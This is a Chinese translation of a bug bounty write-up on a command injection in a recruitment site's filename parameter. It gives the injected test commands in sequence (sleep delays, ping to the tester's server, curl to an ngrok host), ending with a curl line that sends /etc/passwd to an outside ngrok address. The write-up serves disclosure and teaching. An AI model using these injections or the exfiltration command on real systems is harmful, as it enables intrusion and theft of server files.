原文:https://medium.com/bugbountywriteup/command-injection-poc-72cc3743f10d
作者: NoGe
漏洞類型:命令注入
.......
在我測試一個招聘網站的時候,非常有趣的事情是,我發現一個文件名參數可以進行注入
下面是整個漏洞複測流程:
1、首先在這個name參數處輸入''sleep 5' ,發現這個響應包延遲了5-6秒,以下是具體測試圖片
2、我再次輸入命令‘sleep 10’去驗證,發現這個響應包延遲了10-11秒,這裏我確定是存在漏洞了,以下是具體測試圖片
3、我在name參數再次注入‘ping -c 5 <我的服務器ip>’這條命令(這個命令執行成功意味着發送一個5秒的icmp包文到我的服務器上),並且在我的服務器上執行tcpdump -i <interface> -n icmp抓包
4、上述操作執行完成之後,看我的服務器上成功接收到了icmp響應,已經能夠成功的判斷name參數存在命令注入漏洞
5、接下來我繼續做另外一個測試,我在我的vps上面使用ngrok搭建web服務(./ngrok http 80),並且我在這個name參數處執行‘curl bd1b378d.ngrok.io’命令
6、現在我們我的ngrok的web頁面上看到了來自000.000.39.169這個ip地址的響應包
7、接下來我們可以使用命令‘curl -F shl=@/etc/passwd blablabla.ngrok.io’ 來讀取服務器的/etc/passwd文件併發送到我的ngrok上面